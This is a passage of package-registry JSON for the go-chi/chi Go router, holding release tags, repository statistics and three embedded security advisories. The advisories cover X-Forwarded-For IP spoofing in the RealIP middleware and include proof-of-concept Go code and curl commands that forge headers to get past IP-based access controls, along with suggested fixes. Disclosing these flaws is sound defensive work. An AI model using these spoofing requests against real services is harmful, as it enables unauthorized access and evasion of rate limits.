ts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.199Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/go-chi/chi/v5/middleware","advisories":[{"uuid":"GSA_kwCzR0hTQS0zZnhqLTZqaDgtaHZoeM4ABZgo","url":"https://github.com/advisories/GHSA-3fxj-6jh8-hvhx","title":"chi Has an IP Spoofing Vulnerability in `middleware.RealIP`","description":"## Summary\nThe `RealIP` middleware in `go-chi/chi` is vulnerable to IP spoofing because it blindly trusts the first (leftmost) element of the `X-Forwarded-For` HTTP header. This allows a remote attacker to bypass IP-based access control lists (ACLs) and rate-limiting mechanisms by providing a spoofed IP address in the header.\n\n## Details\nIn `middleware/realip.go`, the `realIP` function parses the `X-Forwarded-For` header and extracts the first comma-separated value:\n\n```go\nfunc realIP(r *http.Request) string {\n    // ...\n    } else if xff := r.Header.Get(xForwardedFor); xff != \"\" {\n        ip, _, _ = strings.Cut(xff, \",\")\n    }\n    // ...\n}\n```\n\nStandard practice for `X-Forwarded-For` is that each proxy appends the client's IP to the end of the list. However, since the client can also provide this header, the leftmost values are untrusted. A client can send a header like `X-Forwarded-For: \u003cspoofed_ip\u003e, \u003cactual_proxy_ip\u003e`, and `go-chi/chi` will treat `\u003cspoofed_ip\u003e` as the source of the request.\n\n## Proof of Concept (PoC)\nThe following code demonstrates how an attacker can bypass an IP-based restriction.\n\n```go\npackage main\n\nimport (\n        \"fmt\"\n        \"net/http\"\n        \"net/http/httptest\"\n\n        \"github.com/go-chi/chi/v5\"\n        \"github.com/go-chi/chi/v5/middleware\"\n)\n\nfunc main() {\n        r := chi.NewRouter()\n\n        // Enable the vulnerable RealIP middleware\n        r.Use(middleware.RealIP)\n\n        // An endpoint that should be restricted to a specific administrator IP (1.2.3.4)\n        r.Get(\"/admin/secret\", func(w http.ResponseWriter, r *http.Request) {\n                clientIP := r.RemoteAddr\n                fmt.Printf(\"[Server] Request received from IP: %s\\n\", clientIP)\n\n                // Simulate IP-based access control\n                if clientIP == \"1.2.3.4\" {\n                        w.WriteHeader(http.StatusOK)\n                        w.Write([]byte(\"CONFIDENTIAL: The secret code is 42\\n\"))\n                } else {\n                        w.WriteHeader(http.StatusForbidden)\n                        w.Write([]byte(\"Access Denied: You are not an administrator.\\n\"))\n                }\n        })\n\n        // --- Attack Simulation ---\n        fmt.Println(\"--- PoC: IP Spoofing Attack on chi/middleware.RealIP ---\")\n\n        // 1. Normal Request (Should be denied)\n        req1, _ := http.NewRequest(\"GET\", \"/admin/secret\", nil)\n        rr1 := httptest.NewRecorder()\n        r.ServeHTTP(rr1, req1)\n        fmt.Printf(\"[Client] Normal Request -\u003e Status: %d, Body: %s\", rr1.Code, rr1.Body.String())\n\n        // 2. Spoofed Request (Using X-Forwarded-For)\n        // Attacker claims to be '1.2.3.4'\n        req2, _ := http.NewRequest(\"GET\", \"/admin/secret\", nil)\n        req2.Header.Set(\"X-Forwarded-For\", \"1.2.3.4, 5.6.7.8\") // 5.6.7.8 is a fake proxy IP\n        rr2 := httptest.NewRecorder()\n        r.ServeHTTP(rr2, req2)\n        fmt.Printf(\"[Client] Spoofed Request -\u003e Status: %d, Body: %s\", rr2.Code, rr2.Body.String())\n}\n```\n\n## Impact\nAn attacker can masquerade as any IP address. This can lead to:\n- **Bypass of Authentication/Authorization:** Accessing administrative panels or private APIs restricted by IP.\n- **Rate Limiting Evasion:** Circumbeting rate limiters that use `RemoteAddr` as a key.\n- **Log Forgery:** Causing incorrect IP addresses to be recorded in security logs.\n\n## CWE\n- **CWE-290:** Authentication Bypass by Spoofing\n- **CWE-345:** Insufficient Verification of Data Authenticity\n\n## CVSS Score\n- **CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N** (6.9 Moderate)\n\n## Affected Versions\n- `github.com/go-chi/chi/v5` \u003c= `v5.2.1` (and all previous versions)\n\n## Recommendation\n1.  **Stop using `middleware.RealIP`** if you cannot guarantee that the incoming request headers are from a trusted source and have been sanitized by a proxy.\n2.  Implement a trust-based IP extraction mechanism that verifies the chain of proxies.\n3.  Use the `X-Forwarded-For` header by traversing it from **right to left** and stopping at the first IP address that is not in your list of trusted proxies.\n\n## Suggested Fix\nA secure implementation of `RealIP` should allow developers to specify a list of trusted proxy IP ranges (CIDRs). Below is a conceptual example of how to fix this by traversing the `X-Forwarded-For` header from right to left:\n\n```go\nfunc GetClientIP(r *http.Request, trustedProxies []net.IPNet) string {\n        xff := r.Header.Get(\"X-Forwarded-For\")\n        if xff == \"\" {\n                return r.RemoteAddr\n        }\n\n        ips := strings.Split(xff, \",\")\n        // Traverse from right to left\n        for i := len(ips) - 1; i \u003e= 0; i-- {\n                ipStr := strings.TrimSpace(ips[i])\n                ip := net.ParseIP(ipStr)\n                if ip == nil {\n                        continue\n                }\n\n                if !isTrustedProxy(ip, trustedProxies) {\n                        return ipStr\n                }\n        }\n\n        return r.RemoteAddr\n}\n\nfunc isTrustedProxy(ip net.IP, trustedProxies []net.IPNet) bool {\n        for _, network := range trustedProxies {\n                if network.Contains(ip) {\n                        return true\n                }\n        }\n        return false\n}\n```\n\nBy providing a configuration like `middleware.RealIPWithConfig(Config{TrustedProxies: []string{\"10.0.0.0/8\"}})` , the middleware can safely identify the true client IP even in complex proxy environments.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-25T18:21:37.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.9,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/go-chi/chi/security/advisories/GHSA-3fxj-6jh8-hvhx","https://github.com/advisories/GHSA-3fxj-6jh8-hvhx"],"source_kind":"github","identifiers":["GHSA-3fxj-6jh8-hvhx"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-25T19:00:08.713Z","updated_at":"2026-06-26T02:00:10.087Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zZnhqLTZqaDgtaHZoeM4ABZgo","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zZnhqLTZqaDgtaHZoeM4ABZgo","packages":[{"ecosystem":"go","package_name":"github.com/go-chi/chi/v5/middleware","versions":[{"first_patched_version":"5.3.0","vulnerable_version_range":"\u003e= 5.2.1, \u003c 5.3.0"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fv5%2Fmiddleware"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zZnhqLTZqaDgtaHZoeM4ABZgo/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yanI3LWpnZ2gtcGdjcM4ABZgn","url":"https://github.com/advisories/GHSA-rjr7-jggh-pgcp","title":"chi's RealIP Middleware allows IP spoofing via unvalidated X-Forwarded-For header","description":"### Summary\nrealip middleware in go-chi/chi trusts headers like x-forwarded-for without checking them, so attackers can fake their ip and bypass rate limits or access controls\n\n### Details\n\nthe vuln is in middleware/realip.go , the realIP() function pulls IPs straight from client headers and replaces r.RemoteAddr without checking if the request came from a trusted proxy\n\n```go\nfunc realIP(r *http.Request) string {\n    var ip string\n    if tcip := r.Header.Get(trueClientIP); tcip != \"\" {\n        ip = tcip  // controlled by attacker\n    } else if xrip := r.Header.Get(xRealIP); xrip != \"\" {\n        ip = xrip  // controlled by attacker\n    } else if xff := r.Header.Get(xForwardedFor); xff != \"\" {\n        ip, _, _ = strings.Cut(xff, \",\")  // controlled by attacker\n    }\n    // ...\n    return ip\n}\n```\n\nno trusted proxy cidr check in place, any client can send these headers\n\n### PoC\n\ncreate a server with chi and use realip middleware\n\n```go\npackage main\n\nimport (\n    \"fmt\"\n    \"net/http\"\n    \"github.com/go-chi/chi/v5\"\n    \"github.com/go-chi/chi/v5/middleware\"\n)\n\nfunc main() {\n    r := chi.NewRouter()\n    r.Use(middleware.RealIP)\n\n    r.Get(\"/admin\", func(w http.ResponseWriter, r *http.Request) {\n        // ip-based access control got bypassed\n        if r.RemoteAddr == \"127.0.0.1\" {\n            w.Write([]byte(\"SECRET ADMIN DATA\"))\n            return\n        }\n        http.Error(w, \"Forbidden\", 403)\n    })\n\n    http.ListenAndServe(\":8080\", r)\n}\n```\n\nspoofed the ip to bypass access control\n\n```bash\ncurl -H \"X-Forwarded-For: 127.0.0.1\" http://localhost:8080/admin\n```\n\n\n### Impact\n\n- ip-based access control bypass lets attackers reach restricted endpoints\n- rate limiting bypass lets attackers avoid limits by rotating spoofed ips\n- audit logs show fake ips picked by attacker instead of real ones\n- attackers can get around geo ip restrictions\n\n## Remediation Recommendation\n\nvalidate proxy cidr first before trusting forwarded ip headers\n\n```go\n// add your reverse proxy ip addresses here\nvar trustedProxies = []net.IPNet{\n       {IP: net.ParseIP(\"10.0.0.0\"), Mask: net.CIDRMask(8, 32)},\n    {IP: net.ParseIP(\"172.16.0.0\"), Mask: net.CIDRMask(12, 32)},\n    {IP: net.ParseIP(\"192.168.0.0\"), Mask: net.CIDRMask(16, 32)},\n}\n\nfunc isTrustedProxy(ip net.IP) bool {\n    for _, cidr := range trustedProxies {\n        if cidr.Contains(ip) {\n            return true\n        }\n    }\n    return false\n}\n```","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-25T18:19:15.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/go-chi/chi/security/advisories/GHSA-rjr7-jggh-pgcp","https://github.com/go-chi/chi/releases/tag/v5.3.0","https://github.com/advisories/GHSA-rjr7-jggh-pgcp"],"source_kind":"github","identifiers":["GHSA-rjr7-jggh-pgcp"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-25T19:00:08.713Z","updated_at":"2026-08-13T01:01:49.128Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yanI3LWpnZ2gtcGdjcM4ABZgn","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yanI3LWpnZ2gtcGdjcM4ABZgn","packages":[{"ecosystem":"go","package_name":"github.com/go-chi/chi/v5/middleware","versions":[{"first_patched_version":"5.3.0","vulnerable_version_range":"\u003c 5.3.0"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fv5%2Fmiddleware"},{"ecosystem":"go","package_name":"github.com/go-chi/chi/v4/middleware","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 4.1.3"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fv4%2Fmiddleware"},{"ecosystem":"go","package_name":"github.com/go-chi/chi/v3/middleware","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 3.3.5"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fv3%2Fmiddleware"},{"ecosystem":"go","package_name":"github.com/go-chi/chi/v2/middleware","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 2.1.1"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fv2%2Fmiddleware"},{"ecosystem":"go","package_name":"github.com/go-chi/chi/middleware","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.5.5"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fmiddleware"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yanI3LWpnZ2gtcGdjcM4ABZgn/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05ZzVxLTJ3NXgtaG14Zs4ABZgm","url":"https://github.com/advisories/GHSA-9g5q-2w5x-hmxf","title":"chi Middleware Vulnerable to Potential IP Spoofing via `X-Forwarded-For` Header in `Request.RemoteAddr` Resolution","description":"### Summary\nThe vulnerability allows the `Request.RemoteAddr` to be spoofed when determining the request source IP via the `X-Forwarded-For` header. This could result in misidentification of the request source and potentially compromise access control and logging integrity.\n\n### Details\nCurrently, the `RealIP()` implementation splits the `X-Forwarded-For` header by `,` and uses the first IP.\nhttps://github.com/go-chi/chi/blob/v5.1.0/middleware/realip.go#L50-L54\n\nHowever, relying on the first IP in the `X-Forwarded-For` header is insecure because it can be manipulated by attackers to falsify the source IP.\n\nMalicious Case:\n1. A malicious client sends a request with a forged IP in the X-Forwarded-For header: `X-Forwarded-For: \u003cforged-ip\u003e`\n2. The proxy appends the actual client’s IP and forwards the request: `X-Forwarded-For: \u003cforged-ip\u003e,\u003cclient-ip\u003e`\n3. If the server always uses the first IP, it becomes vulnerable to IP spoofing.\n\nIdeally, the implementation should verify IPs starting from the end of the `X-Forwarded-For` header value, skipping trusted IPs within the system, and using the first untrusted IP as the actual client IP.\n\nFor example, the `labstack/echo` web framework processes the `X-Forwarded-For` header by checking IPs from the end, skipping trusted IPs, and using the first untrusted IP as the client's ip.\nhttps://github.com/labstack/echo/blob/v4.13.2/ip.go#L261-L273\n\n### PoC\n#### 1. Run the Go application with the following code:\n```go\npackage main\n\nimport (\n    \"fmt\"\n    \"log\"\n    \"net/http\"\n\n    \"github.com/go-chi/chi/v5/middleware\"\n)\n\nfunc main() {\n    // Set handler to print the remote address\n    handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n        fmt.Fprintln(\n            w,\n            fmt.Sprintf(\"remote addr: %s (want 192.0.2.1)\", r.RemoteAddr),\n        )\n    })\n    // Use RealIP middleware\n    log.Fatal(http.ListenAndServe(\":8080\", middleware.RealIP(handler)))\n}\n```\n#### 2. Send a request to the server using curl with a manipulated X-Forwarded-For header:\n```\n$ curl localhost:8080 -H 'X-Forwarded-For: 192.0.2.2, 192.0.2.1'\nremote addr: 192.0.2.2 (want 192.0.2.1)\n```\n\n### Impact\nThis vulnerability can lead to a request source IP spoofing issue, which may allow attackers to bypass access controls or falsify request logs. It primarily affects systems that rely on X-Forwarded-For to determine the actual client IP, particularly in scenarios where intermediary proxies or load balancers are involved.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-25T18:18:56.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/go-chi/chi/security/advisories/GHSA-9g5q-2w5x-hmxf","https://github.com/go-chi/chi/releases/tag/v5.3.0","https://github.com/advisories/GHSA-9g5q-2w5x-hmxf"],"source_kind":"github","identifiers":["GHSA-9g5q-2w5x-hmxf"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-25T19:00:08.713Z","updated_at":"2026-08-03T23:01:04.397Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05ZzVxLTJ3NXgtaG14Zs4ABZgm","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05ZzVxLTJ3NXgtaG14Zs4ABZgm","packages":[{"ecosystem":"go","package_name":"github.com/go-chi/chi/v5/middleware","versions":[{"first_patched_version":"5.3.0","vulnerable_version_range":"\u003c 5.3.0"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fv5%2Fmiddleware"},{"ecosystem":"go","package_name":"github.com/go-chi/chi/v4/middleware","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 4.1.3"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fv4%2Fmiddleware"},{"ecosystem":"go","package_name":"github.com/go-chi/chi/v3/middleware","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 3.3.5"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fv3%2Fmiddleware"},{"ecosystem":"go","package_name":"github.com/go-chi/chi/v2/middleware","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 2.1.1"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fv2%2Fmiddleware"},{"ecosystem":"go","package_name":"github.com/go-chi/chi/middleware","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003e= 0.9.0, \u003c= 1.5.5"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fmiddleware"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05ZzVxLTJ3NXgtaG14Zs4ABZgm/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-chi/chi/v5/middleware","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-chi/chi/v5/middleware","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-chi/chi/v5/middleware/dependencies","status":"removed","funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv5%2Fmiddleware/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv5%2Fmiddleware/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv5%2Fmiddleware/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv5%2Fmiddleware/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv5%2Fmiddleware/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv5%2Fmiddleware/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":4032874,"name":"gopkg.in/go-chi/chi.v2","ecosystem":"go","description":"Package chi is a small, idiomatic and composable router for building HTTP services.","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"gopkg.in/go-chi","versions_count":3,"first_release_published_at":"2017-01-06T20:47:52.000Z","latest_release_published_at":"2023-09-07T09:44:41.000Z","latest_release_number":"v2.1.1","last_synced_at":"2026-08-12T02:06:18.803Z","created_at":"2022-04-12T09:08:44.101Z","updated_at":"2026-08-12T02:06:18.803Z","registry_url":"https://pkg.go.dev/gopkg.in/go-chi/chi.v2","install_command":"go get gopkg.in/go-chi/chi.v2","documentation_url":"https://pkg.go.dev/gopkg.in/go-chi/chi.v2#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous 